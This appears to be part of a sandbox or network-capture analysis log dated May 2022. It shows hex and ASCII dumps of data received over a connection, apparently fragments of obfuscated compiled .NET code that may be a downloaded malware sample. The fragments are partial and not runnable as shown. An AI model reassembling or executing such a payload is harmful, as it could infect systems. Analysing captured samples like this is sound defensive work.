                                                                                  2022-05-02 11:03:03 UTC1931INData Raw: 7e 00 03 05 05 00 00 03 d4 00 03 05 05 00 00 03 72 00 03 05 05 00 00 06 11 00 03 05 05 00 00 05 fd 00 03 05 05 00 00 04 f9 00 03 05 05 00 00 05 cb 00 03 0c 90 00 00 04 79 00 03 0c 90 00 00 03 b9 00 03 05 05 00 00 03 64 00 03 05 05 00 00 06 0c 00 03 05 05 00 00 05 f8 00 03 05 05 00 00 04 f4 00 03 0c 90 00 00 05 c6 00 03 0c 90 00 00 04 74 00 03 0c 90 00 00 03 b2 00 03 0c 90 00 00 03 5f 00 03 0c 90 00 00 06 07 00 03 0c 90 00 00 03 cd 00 03 05 05 00 00 03 c3 00 03 05 05 00 00 03 c8 00 03 05 05 00 00 03 be 00 03 05 05 00 00 03 ad 00 03 05 05 00 00 02 de 00 03 05 05 00 00 03 d2 00 03 05 05 00 00 03 b7 00 03 05 05 00 00 03 6e 00 03 05 05 00 00 03 70 00 03 10 65 00 00 02 dc 00 03 10 65 00 00 02 da 00 03 0c 90 00 00 02 d1 00 03 02 e1 00 00 03 70 00 03 02 e1 00 00
                                                                                  Data Ascii: ~rydt_npeep
                                                                                  2022-05-02 11:03:03 UTC1947INData Raw: 00 00 00 3e 01 00 00 01 00 17 42 0a 15 00 65 00 00 00 00 00 00 3d ed 00 00 01 00 17 3e 0a 14 00 65 00 00 00 00 00 00 3d d9 00 00 01 00 17 3a 0a 13 00 65 00 00 00 00 00 00 3d c5 00 00 01 00 17 36 0a 12 00 65 00 00 00 00 00 00 3d b1 00 00 01 00 17 32 0a 11 00 65 00 00 00 00 00 00 3d 9d 00 00 01 00 17 2e 0a 10 00 65 00 00 00 00 00 00 3d 89 00 00 01 00 17 2a 0a 0f 00 65 00 00 00 00 00 00 3d 75 00 00 01 00 17 26 0a 0e 00 65 00 00 00 00 00 00 3d 61 00 00 01 00 17 22 0a 0d 00 65 00 00 00 00 00 00 3d 4d 00 00 01 00 17 1e 0a 0c 00 65 00 00 00 00 00 00 3d 39 00 00 01 00 17 1a 0a 0b 00 65 00 00 00 00 00 00 3d 25 00 00 01 00 17 16 0a 0a 00 65 00 00 00 00 00 00 3d 11 00 00 01 00 17 12 0a 09 00 65 00 00 00 00 00 00 3c fd 00 00 01 00 17 0e 0a 08 00 65 00 00 00 00 00 00
                                                                                  Data Ascii: >Be=>e=:e=6e=2e=.e=*e=u&e=a"e=Me=9e=%e=e<e
                                                                                  2022-05-02 11:03:03 UTC1963INData Raw: 70 00 10 01 0d 00 36 01 ac 00 5d 00 00 00 00 00 00 03 6e 00 10 01 0d 00 36 01 71 00 61 00 00 00 00 00 00 02 dc 00 00 01 05 00 36 00 22 00 61 00 00 00 00 00 00 02 da 00 00 01 05 00 36 00 20 00 5d 00 00 00 00 00 00 02 d1 00 10 01 0d 00 35 00 20 00 59 00 00 00 00 00 00 03 64 00 10 01 80 00 2b 00 1f 00 59 00 00 00 00 00 00 03 5f 00 10 01 00 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 4c 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 39 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 26 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 13 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 00 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 02 e3 00 00 01 13 00 2a 00 19 00 59 00 00 00 00 00 00 02 de 00 00 01 00 00 1e 00 11 00 59 00 00 00 00 00 00 02 dc 00 10
                                                                                  Data Ascii: p6]n6qa6"a6 ]5 Yd+Y_+]L+]9+]&+]+]+]*YY
                                                                                  2022-05-02 11:03:03 UTC1979INData Raw: b8 28 05 2b 4a 2a 06 00 1c 96 6f 01 0e 00 0e 02 0e 33 40 97 cf 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f4 d0 41 32 b9 3e 28 05 2b 4a 2a 06 00 1c 92 6f 01 0e 00 0e 02 0e 3b 34 34 30 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f3 d0 44 7f 03 8b 28 05 2b 4a 2a 06 00 1c 8e 6f 01 0e 00 0e 02 0e 3e 10 e8 72 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f2 d0 6b 06 91 30 28 05 2b 4a 00 00 2a 06 00 1c 8a 6f 00 0e 01 0e 3d 69 12 f5 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 04 f1 d0 6a 0d bb 96 28 05 2b 4a 00 00 2a 06 00 1c 86 6f 00 0e 01 0e 64 68 e2 48 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 04 f0 d0 2e 5d 96 b9 28 05 2b 4a 2a 06 00 1c 82 6f 01 0e 00 0e 02 0e 3e 33 3d ec 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 ef d0 67 61 f5 a0 28 05 2b 4a 00 00 2a 06 00 1c 7e 6f 00 0e
                                                                                  Data Ascii: (+J*o3@(+N*)(A2>(+J*o;440(+N*)(D(+J*o>r(+N*)(k0(+J*o=i(+F*)(j(+J*odhH(+F*)(.](+J*o>3=(+N*)(ga(+J*~o
                                                                                  2022-05-02 11:03:03 UTC1995INData Raw: 4a 00 00 2a 06 00 16 6e 6f 00 0e 01 0e 6b 23 21 d7 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 6a d0 6d 0f d3 0a 28 05 2b 4a 2a 06 00 16 6a 6f 01 0e 00 0e 02 0e 30 40 b6 5b 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 03 69 d0 63 41 c9 6e 28 05 2b 4a 00 00 2a 06 00 16 66 6f 00 0e 01 0e 35 09 04 32 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 68 d0 50 61 aa a6 28 05 2b 4a 00 00 2a 06 00 16 62 6f 00 0e 01 0e 5b 6d b9 c8 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 67 d0 64 5a c5 70 28 05 2b 4a 00 00 2a 06 00 16 5e 6f 00 0e 01 0e 6d 2d 43 a0 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 66 d0 41 73 4f f9 28 05 2b 4a 00 00 2a 06 00 16 5a 6f 00 0e 01 0e 3e 7f 85 62 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 65 d0 64 2f 39 10 28 05 2b 4a 2a 06 00 16 56 6f 01 0e 00 0e 02 0e 5f 0c
                                                                                  Data Ascii: J*nok#!(+F*)(jm(+J*jo0@[(+N*)(icAn(+J*fo52(+F*)(hPa(+J*bo[m(+F*)(gdZp(+J*^om-C(+F*)(fAsO(+J*Zo>b(+F*)(ed/9(+J*Vo_
                                                                                  2022-05-02 11:03:03 UTC2011INData Raw: 02 00 01 d8 d0 37 4d 5d 71 28 05 2b 4a 2a 06 00 10 22 6f 00 0e 46 05 2b 5d 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 01 d7 d0 57 7d 3a 7a 28 05 2b 4a 00 00 2a 06 00 10 1e 6f 00 0e 01 0e 4c 09 94 d6 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d6 d0 64 20 65 2e 28 05 2b 4a 00 00 2a 06 00 10 1a 6f 00 0e 01 0e 5d 0e 08 43 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d5 d0 6a 13 f4 10 28 05 2b 4a 2a 06 00 10 16 6f 00 0e 53 22 d8 c8 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 01 d4 d0 3f 1c e8 d9 28 05 2b 4a 00 00 2a 06 00 10 12 6f 00 0e 01 0e 33 38 e0 f6 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d3 d0 56 55 af 53 28 05 2b 4a 00 00 2a 06 00 10 0e 6f 00 0e 01 0e 33 1a e0 13 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d2 d0 69 1f e2 e2 28 05 2b 4a 00 00 2a 06 00 10 0a 6f 00 0e
                                                                                  Data Ascii: 7M]q(+J*"oF+](+>*)(W}:z(+J*oL(+F*)(d e.(+J*o]C(+F*)(j(+J*oS"(+>*)(?(+J*o38(+F*)(VUS(+J*o3(+F*)(i(+J*o
                                                                                  2022-05-02 11:03:03 UTC2027INData Raw: 1f 00 00 08 00 00 00 00 1f 00 00 00 02 00 00 1c 41 00 00 00 ff ff f7 de 38 dc 00 00 00 00 38 0a 00 00 77 28 00 11 00 00 00 00 38 00 00 00 11 39 01 11 ff ff f7 fc dd ff ff fc c0 38 a2 0a 00 02 46 6f 0a 00 02 6f 6f 9a 0c 11 06 11 0c 11 07 11 ff ff fd 4d 38 04 13 0a 00 03 f5 73 17 a2 0a 00 00 23 28 1b 00 00 51 d0 17 25 a2 0a 00 00 23 28 06 00 0c bf 28 01 00 00 16 20 16 25 01 00 00 2f 8d 18 0a 00 00 23 28 06 00 0c bf 28 01 00 00 16 20 0a 00 00 5b 7e ff ff fb ce 38 0e 13 16 ff ff fa ad 38 ff ff fa 6a 39 0a 00 01 dc 6f 10 11 ff ff fb 50 38 0e 13 58 17 0e 11 ff ff fe 08 38 06 00 21 37 28 04 00 0c 92 7e 0e 11 05 11 ff ff f8 ad 38 00 00 00 09 20 0a 00 00 19 6f 0a 00 03 3a 7e 05 11 ff ff fa aa 38 ff ff fe 15 38 ff ff fa 77 38 ff ff fe 30 3a 0a 00 02 67 6f 02 ff ff
                                                                                  Data Ascii: A88w(898FoooM8s#(Q%#(( %/#(( [~88j9oP8X8!7(~8 o:~88w80:go
                                                                                  2022-05-02 11:03:03 UTC2043INData Raw: 39 06 00 0f 77 28 04 00 07 54 7b 12 11 ff ff f7 85 38 18 13 0a 00 02 46 6f 18 11 00 00 24 70 38 00 00 18 17 38 00 00 0e 8a 38 0b 13 06 00 0f 5c 28 0d 11 00 00 24 9f 38 0b 13 06 00 0f 5c 28 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 ff ff dd e2 38 00 00 00 46 20 00 00 10 0f 38 00 00 14 6b 38 0b 13 06 00 0f 5c 28 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 2a 00 00 09 7d 38 07 13 17 00 00 09 16 38 00 00 1e 1c 3e 16 06 00 20 f7 28 04 00 0c 82 7e 04 00 07 91 7b 02 00 00 08 49 38 0f 13 0a 00 03 d1 73 ff ff e8 50 38 06 00 20 b7 28 04 00 0c 72 7e 06 00 20 ef 28 04 00 0c 80 7e 0b 11 23 11 04 00 07 91 7b 02 ff ff de 60 38 00 00 00 1f 20 26 ff ff de 6b 39 06 00 0f 6a 28 00 00 00 17 20 0d 13 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 7a 06 00 0e bf 73
                                                                                  Data Ascii: 9w(T{8Fo$p888\($8\( (u~{8F 8k8\( (u~{*}88> (~{I8sP8 (r~ (~#{`8 &k9j( (u~{zs
                                                                                  2022-05-02 11:03:03 UTC2059INData Raw: 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 4d 49 8f 6b 28 05 2b 4a 00 00 2a 06 00 20 9b 28 04 00 0c 6b 7e 06 00 20 0b 28 04 00 0c 47 7e 02 5e 7f 53 ea 28 05 2b 76 00 00 ff ff ff df 38 ff ff ff e6 3b 04 00 07 62 7b 02 04 00 07 62 7b 00 11 2a 17 2a 17 2a 17 2a 16 2a 17 ff ff ff c4 38 00 00 00 0b 39 06 00 20 07 28 04 00 0c 46 7e 03 00 00 00 1d 38 00 00 00 24 3b 04 00 07 63 7b 02 04 00 07 63 7b 00 11 ff ff ff e3 38 00 00 00 35 39 02 00 01 a2 75 03 00 00 00 10 38 00 13 02 00 01 a2 74 03 00 00 00 34 38 68 0c e0 26 28 05 2b 11 00 01 cd 00 00 00 76 00 03 30 13 00 00 00 2a 16 2a 16 2a 17 2a 16 ff ff ff c0 38 ff ff ff c7 3b 04 00 07 63 7b 02 04 00 07 63 7b 00 11 ff ff ff ca 38 00 00 00 20 39 02 00 01 a2 75 03 00 00 00 27 38 00 00 00 2e 3b 04 00 07 62 7b 02 04 00 07 62
                                                                                  Data Ascii: B*(9~MIk(+J* (k~ (G~^S(+v8;b{b{*****89 (F~8$;c{c{859u8t48h&(+v0****8;c{c{8 9u'8.;b{b
                                                                                  2022-05-02 11:03:03 UTC2075INData Raw: 2a 06 00 0d a0 73 6a d8 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 06 00 0e 14 6f 02 2a 06 00 0d a0 73 d8 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 01 95 74 03 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 00 00 69 38 00 00 00 59 39 06 00 20 0f 28 04 00 0c 48 7e 03 00 00 00 ed 38 00 00 00 05 39 06 00 20 07 28 04 00 0c 46 7e 03 54 2d 6d 01 28 05 2b 00 00 00 00 00 00 01 35 00 03 30 13 ff ff ff 50 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 ff ff fe ee 38 ff ff ff 1f 40 1e 0a 00 00 1b 28 ff ff ff 87 38 ff ff ff b8 40 1e 0a 00 00 1b 28 00 00 00 10 38 ff ff ff 6c 39 06 00 20 13 28 04 00 0c 49 7e 03 2a 06 00 0d a0 73 6a 5a 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 06 00 0e 14 6f
                                                                                  Data Ascii: *sjA{B|tA{B|o*sL{M|otL{M|oi8Y9 (H~89 (F~T-m(+50P8 (G~8@(8@(8l9 (I~*sjZA{B|tA{B|o
                                                                                  2022-05-02 11:03:03 UTC2091INData Raw: 93 00 04 30 13 00 ff ff ff a6 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 ff ff ff 8b 38 ff ff ff a2 39 06 00 20 13 28 04 00 0c 49 7e 03 2a 04 fe 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 02 00 00 00 00 38 00 00 00 23 39 06 00 20 0f 28 04 00 0c 48 7e 03 00 00 00 48 38 00 00 00 05 39 06 00 20 07 28 04 00 0c 46 7e 03 7a 06 00 0e bf 73 2a 06 00 20 83 28 04 00 0c 65 7e 02 02 00 01 98 74 03 00 00 00 18 38 58 5e f5 a2 28 05 2b 00 00 00 00 00 00 00 93 00 04 30 13 ff ff ff a3 38 ff ff ff 93 39 06 00 20 07 28 04 00 0c 46 7e 03 ff ff ff 81 38 ff ff ff 90 3a 06 00 20 13 28 04 00 0c 49 7e 03 2a 01 fe 16 03 fe 04 00 07 40 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 40 7b 04 00 07 42 7c 02 ff ff ff d9 38 01 10 06 00 20 0b 28 04 00 0c
                                                                                  Data Ascii: 08 (G~89 (I~*A{B|tA{B|8#9 (H~H89 (F~zs* (e~t8X^(+089 (F~8: (I~*@{B|t@{B|8 (
                                                                                  2022-05-02 11:03:03 UTC2107INData Raw: 07 25 7e 04 00 07 25 80 02 00 01 8b 74 0a 00 00 ac 28 0a 00 00 23 28 06 00 0c bf 28 02 00 01 8b 20 06 00 0c 34 28 0a 00 00 c6 28 70 00 07 05 72 0a 00 00 bb 28 70 00 06 f3 72 06 00 0c 3b 28 00 00 00 3c 3a 04 00 07 25 7e 00 00 00 00 00 00 00 55 00 06 30 13 2a 06 00 0c a6 6f 04 03 02 04 00 07 16 7e 04 00 07 16 80 02 00 01 8a 74 0a 00 00 ac 28 0a 00 00 23 28 06 00 0c bf 28 02 00 01 8a 20 06 00 0c 34 28 0a 00 00 c6 28 70 00 06 df 72 0a 00 00 bb 28 70 00 06 d3 72 06 00 0c 3b 28 00 00 00 3c 3a 04 00 07 16 7e 00 00 00 00 00 00 00 54 00 05 30 13 01 00 00 16 06 00 ed 57 00 96 00 00 01 00 00 16 06 00 8f 5d 00 32 00 00 01 00 00 16 06 00 2b 2b 00 00 00 00 00 00 28 01 00 2a 06 2a 70 00 00 01 72 00 00 00 00 dd 26 00 00 00 06 dd 00 00 00 11 dd 0a 0a 00 00 c0 6f 0a 00 02
                                                                                  Data Ascii: %~%t(#(( 4((pr(pr;(<:%~U0*o~t(#(( 4((pr(pr;(<:~T0W]2++(**pr&o
                                                                                  2022-05-02 11:03:03 UTC2123INData Raw: 45 00 05 0c fe 00 00 03 5d 38 6d 3a 2e c6 28 05 2b 11 00 01 b1 00 00 03 bc 00 06 30 1b 00 ff ff ff 76 38 ff ff ff 7c 3a 0a 00 01 f0 6f 00 11 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 46 20 03 ff ff ff de 38 04 00 06 f7 7d 03 02 ff ff ff 1c 38 04 00 06 f8 7d 06 00 1f c3 28 04 00 0c 35 7e 03 02 ff ff ff 6a 38 00 00 00 27 3a 06 00 16 6f 28 04 00 09 e0 7e 00 11 ff ff ff 3a 38 00 00 00 00 20 26 ff ff ff 45 39 04 00 08 24 7b 04 00 08 2c 7e 00 00 00 00 20 04 00 06 f6 7d 04 02 2a ff ff ff 70 38 ff ff ff a1 3a 03 00 00 00 32 38 00 13 06 00 18 4b 28 04 00 0a 57 7e 04 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e8 7b 04 00 08 2c 7e 61 44 c4 1a ed 20 65 4b 6e c1 20 00 00 00 a2 38 00 00 00 49 39 06 00 1f bf 28 04 00 0c 34 7e
                                                                                  Data Ascii: E]8m:.(+0v8|:ow(~#((F 8}8}(5~j8':o(~:8 &E9${,~ }*p8:28K(W~zs(&~a{,~aD eKn 8I9(4~
                                                                                  2022-05-02 11:03:03 UTC2139INData Raw: 00 00 2e 38 0a 00 03 50 7e 00 00 00 28 38 51 0a 0d 64 28 05 2b 11 00 01 ab 00 00 00 4b 00 04 30 13 00 ff ff ff c1 38 00 13 0a 00 03 4f 7e 2a ff ff ff e6 38 00 00 00 06 3a 04 00 00 00 0c 38 00 00 00 16 38 0a 00 03 4e 7e 00 00 00 1a 38 0a 00 02 e2 6f 04 00 06 e3 7b 03 00 11 04 00 06 ee 7b 02 00 00 00 27 38 4f 13 06 19 28 05 2b 11 00 01 ab 00 00 00 4b 00 04 30 13 00 00 2a 00 00 00 00 38 06 00 1e e3 28 04 00 0b fd 7e 0a 00 02 db 7e 02 56 59 92 e6 28 05 2b 76 00 00 ff ff ff cc 38 00 13 0a 00 03 4d 7e 00 00 00 00 38 00 00 00 0a 38 0a 00 03 4c 7e 2a 00 00 00 00 38 0a 00 02 e2 6f 04 00 06 e3 7b 03 00 11 04 00 06 ee 7b 02 00 00 00 19 38 00 00 00 2d 3a 04 65 7a d5 16 28 05 2b 11 00 01 ab 00 00 00 46 00 04 30 13 00 ff ff ff c1 38 00 13 0a 00 03 4b 7e 2a 00 00 00 01
                                                                                  Data Ascii: .8P~(8Qd(+K08O~*8:88N~8o{{'8O(+K0*8(~~VY(+v8M~88L~*8o{{8-:ez(+F08K~*
                                                                                  2022-05-02 11:03:03 UTC2155INData Raw: c2 7e 04 00 06 d5 7b 02 00 00 01 e2 38 00 00 05 4c 39 0a 00 02 0c 28 14 04 00 06 d3 7b 02 00 00 05 5d 38 00 00 05 2e 38 00 00 01 32 38 02 13 06 00 08 d3 73 02 11 06 00 1e af 28 04 00 0b f0 7e 02 0d 11 17 7a 0a 00 02 51 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 04 7b 04 00 08 2c 7e 61 66 b0 f3 2a 20 2c ad 50 5f 20 00 00 04 7b 38 00 00 02 b6 38 00 00 01 c5 38 02 13 06 00 09 41 73 02 11 04 00 06 d7 7b 02 00 00 04 4b 38 00 00 03 71 00 00 00 e6 00 00 03 d7 00 00 00 19 00 00 00 85 00 00 04 50 00 00 00 06 45 00 06 0c fe 00 00 03 d7 38 06 00 1a a3 28 04 00 0a ed 7e 00 12 04 00 06 d7 7b 02 00 2a 11 11 00 00 07 9f 38 5e 27 d2 a1 28 05 2b 11 00 01 97 00 00 07 b3 00 0c 30 1b ff ff ff da 38 ff ff ff a9 3a 0a 00 01 a0 28 14 02 ff ff ff b5 38 ff ff ff bc 39 06 00 16
                                                                                  Data Ascii: ~{8L9({]8.828s(~zQs(&~a{,~af* ,P_ {888As{K8qPE8(~{*8^'(+08:(89
                                                                                  2022-05-02 11:03:03 UTC2171INData Raw: 28 04 00 09 a9 7e 6a 15 04 0e 02 03 00 00 00 00 8e 38 48 25 69 8d 28 05 2b 11 00 01 80 00 00 00 af 00 07 30 1b 2a 06 00 1e 0f 28 04 00 0b c8 7e 14 05 04 03 02 2e 57 6b 47 28 05 2b 5e 00 00 00 00 19 00 c0 a8 00 18 00 02 00 00 10 01 00 2a ff ff ff 9d 38 03 10 06 00 1d 27 28 04 00 0b 8e 7e 0a 00 00 25 6f 04 02 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 02 7b 04 00 08 2c 7e 61 ad 10 b6 af 20 c5 e0 e0 c0 20 ff ff fe f4 38 ff ff ff e0 39 0a 00 01 a0 28 14 05 ff ff ff d7 38 00 13 06 00 1d d7 28 04 00 0b ba 7e 03 0f 02 ff ff ff 24 38 01 13 06 00 14 7b 28 04 00 09 63 7e 06 0e 02 03 00 00 00 78 38 dc 00 00 00 00 38 0a 00 00 4c 6f 01 11 00 00 00 00 38 00 00 00 11 39 01 11 00 00 00 96 dd ff ff ff de 38 ff ff ff af 38 ff ff ff d4 38 06 00 1e 0b 28 04
                                                                                  Data Ascii: (~j8H%i(+0*(~.WkG(+^*8'(~%ozs(&~a{,~a 89(8(~$8{(c~x88Lo89888(
                                                                                  2022-05-02 11:03:03 UTC2187INData Raw: 04 11 0a 00 02 da 7e 50 05 0e ff ff fd 10 38 06 00 18 07 28 04 00 0a 46 7e 01 11 00 11 ff ff fc 58 38 ff ff fe 2a 38 00 00 00 a7 38 03 13 16 ff ff ff dc 38 06 00 18 07 28 04 00 0a 46 7e 01 11 00 11 00 00 00 13 38 06 00 1d 77 28 04 00 0b a2 7e 00 11 ff ff ff 88 38 02 13 16 ff ff fe 5b 38 06 00 1d 77 28 04 00 0b a2 7e 00 11 00 00 00 7c 38 0a 00 02 d8 6f 14 04 00 06 93 7b 07 11 0a 00 02 da 7e 50 05 0e 00 00 01 34 38 05 13 16 ff ff fe 23 38 51 06 00 1d 63 28 04 00 0b 9d 7e 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 24 7b 04 00 08 2c 7e 61 8d ac cf 74 20 88 d8 96 e1 20 04 05 0e ff ff fd 5f 38 ff ff fc cf 38 ff ff fe ee 38 04 13 9a 03 11 05 ff ff ff b1 38 05 13 58 17 05 11 ff ff ff cc 38 0a 00 00 19 6f 0a 00 00 31 7e 50 05 0e ff ff fd ab 38 00 00 00 22 3f 69 8e
                                                                                  Data Ascii: ~P8(F~X8*888(F~8w(~8[8w(~|8o{~P48#8Qc(~(&~a${,~at _8888X8o1~P8"?i
                                                                                  2022-05-02 11:03:03 UTC2203INData Raw: fd 7e 10 11 0b 11 ff ff fc 70 38 08 13 58 17 08 11 ff ff f5 a5 38 ff ff fd 05 3a 04 0e ff ff f4 ac 38 1e 13 06 00 1c 47 28 04 00 0b 56 7e 05 16 16 06 00 1c 57 28 04 00 0b 5a 7e 19 11 1c 11 04 00 06 5b 7b 02 00 00 00 28 38 ff ff f7 06 39 06 00 1c 7b 28 04 00 0b 63 7e 06 00 1c 63 28 04 00 0b 5d 7e 19 11 ff ff f3 fb 38 ff ff f7 be 3c 16 2b 00 00 32 28 23 11 22 11 ff ff f8 e5 38 15 13 58 17 15 11 ff ff f9 bb 38 17 13 00 11 ff ff f5 14 38 0e 13 00 11 ff ff fa 1b 38 ff ff f7 02 39 0a 00 00 9b 28 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 2f 7b 04 00 08 2c 7e 61 11 b6 97 80 20 66 ee e7 d7 df 20 1a 11 ff ff fa 63 38 ff ff f7 34 3a 06 00 1c 5f 28 04 00 0b 5c 7e 19 11 ff ff ec eb 38 ff ff fd 5d 3a 0d 11 ff ff ee 14 38 06 00 16 df 28 04 00 09 fc 7e 16 00 11 04 00 06
                                                                                  Data Ascii: ~p8X8:8G(V~W(Z~[{(89{(c~c(]~8<+2(#"8X8889((&~a/{,~a f c84:_(\~8]:8(~
                                                                                  2022-05-02 11:03:03 UTC2219INData Raw: 00 00 0a 5a 00 00 05 f4 00 00 02 26 00 00 06 9b 00 00 05 b3 00 00 00 05 00 00 06 30 00 00 03 26 00 00 05 fc 00 00 01 49 00 00 00 0b 45 00 12 0c fe 00 00 07 e7 38 5b 4e 99 3d 28 05 2b 11 00 01 4a 00 00 0c 5d 00 06 30 13 00 2a 01 fe 03 5f 03 02 68 77 67 91 28 05 2b 3a 00 00 00 ff ff ff 2a 38 01 13 0a 00 02 87 6f 02 ff ff ff e1 38 ff ff ff 95 38 00 00 00 0a 38 ff ff ff 9f 39 0a 00 02 6d 28 14 9a 04 0e 50 05 ff ff ff d1 38 ff ff ff 36 39 0a 00 00 9b 28 04 0a 00 02 0b 6f 06 00 19 ff 28 04 00 0a c4 7e 9a 02 11 03 ff ff ff e7 38 00 00 00 28 3a 50 05 00 00 00 44 38 51 01 00 00 2e 8d 1e 05 00 00 00 19 38 ff ff ff 5b 38 ff ff ff 77 38 a2 02 04 0e 50 05 7a 06 00 05 ce 73 0a 00 01 70 28 0a 00 02 0b 6f 01 11 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c
                                                                                  Data Ascii: Z&0&IE8[N=(+J]0*_hwg(+:*8o8889m(P869(o(~8(:PD8Q.8[8w8Pzsp(o(&~a{,
                                                                                  2022-05-02 11:03:03 UTC2235INData Raw: 00 0c bf 28 01 00 00 cf 20 00 00 00 19 38 06 00 0f d3 28 04 00 08 39 7e 2a 00 00 00 01 38 66 57 60 f2 28 05 2b 00 00 00 00 00 00 00 44 00 02 30 03 00 00 ff ff ff 40 38 06 00 16 7f 28 04 00 09 e4 7e 16 03 ff ff ff 27 38 06 00 16 f7 28 04 00 0a 02 7e 0a 00 02 4d 28 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c 7e 61 6d e2 1c 55 20 65 88 a8 f3 eb 20 06 00 09 4d 28 06 00 0c bf 28 01 00 00 07 20 03 ff ff ff 48 38 06 00 18 cf 28 04 00 0a 78 7e a2 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 fa 20 03 17 25 a2 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 07 20 03 16 25 01 00 00 2f 8d 18 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 09 4e 28 01 00 00 cf 20 03 03 ff ff ff 74 38 06 00 17 53 28 04 00
                                                                                  Data Ascii: ( 8(9~*8fW`(+D0@8(~'8(~M((&~a{,~amU e M(( H8(x~w(~#(( %w(~#(( %/w(~#(N( t8S(
                                                                                  2022-05-02 11:03:03 UTC2251INData Raw: 7e 0a 00 01 9d 7e 03 00 00 07 ec 38 04 13 06 00 19 7b 28 04 00 0a a3 7e 03 11 02 00 00 07 09 38 00 00 02 02 39 01 00 00 d2 75 9a 08 11 04 00 06 26 7b 02 00 00 07 df 38 00 00 07 cf 00 00 00 c2 00 00 08 86 00 00 07 ae 00 00 07 ae 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 08 54 00 00 07 7e 00 00 00 0d 45 59 19 06 11 00 00 00 83 38 00 00 09 09 00 00 02 5c 00 00 08 11 00 00 00 05 00 00 01 80 00 00 00 88 00 00 00 06 45 00 15 0c fe 00 00 08 6a 38 03 13 16 00 00 00 00 00 38 01 13 02 00 01 7d 8d 69 8e 04 00 06 26 7b 02 00 00 00 0a 0e 38 6d 7c 42 25 28 05 2b 11 00 01 28 00 00 0a 39 00 06 30 1b 00 00 7a 0a 00 00 15 73 55 5e e8 0f 28 05 2b 36 00 00 00 00 00 00 00 19 00 00 01 4d 00 00 01 26 00 00 00 27 00 00 00 02 00 00 1c 41 00 ff
                                                                                  Data Ascii: ~~8{(~89u&{8~~~~~~T~EY8\Ej88}i&{8m|B%(+(90zsU^(+6M&'A
                                                                                  2022-05-02 11:03:03 UTC2267INData Raw: a7 38 04 00 06 00 7d 0a 00 02 4e 6f a2 00 11 16 25 01 00 00 2f 8d 17 06 00 16 13 28 04 00 09 c9 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 ca 20 03 02 00 00 00 00 38 ff ff ff e2 39 06 00 16 6f 28 04 00 09 e0 7e 00 11 00 00 00 4b 38 04 00 06 00 7d 00 11 02 2a 00 00 00 5a 38 00 00 00 85 3a 06 00 17 4b 28 04 00 0a 17 7e 04 00 00 00 00 38 06 00 08 6a 28 04 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 53 3f 7c 88 28 05 2b 11 00 00 f6 00 00 00 c9 00 07 30 13 00 2a 06 00 0c bf 28 00 00 09 fe 00 49 17 5e de 28 05 2b 4a 00 00 2a 04 00 05 ff 7e 2f 45 6d 2d 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 05 ff 7e 5b 60 a8 3b 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 63 08 31 ab 28 05 2b 4a 00 00 ff ff ff 79 38 06 00 16 87 28 04 00 09 e6 7e 0a 00 00 3a 6f 06 00 13 87
                                                                                  Data Ascii: 8}No%/(~#(( 89o(~K8}*Z8:K(~8j(8(:~S?|(+0*(I^(+J*~/Em-(+6*~[`;(+B*(9~c1(+Jy8(~:o
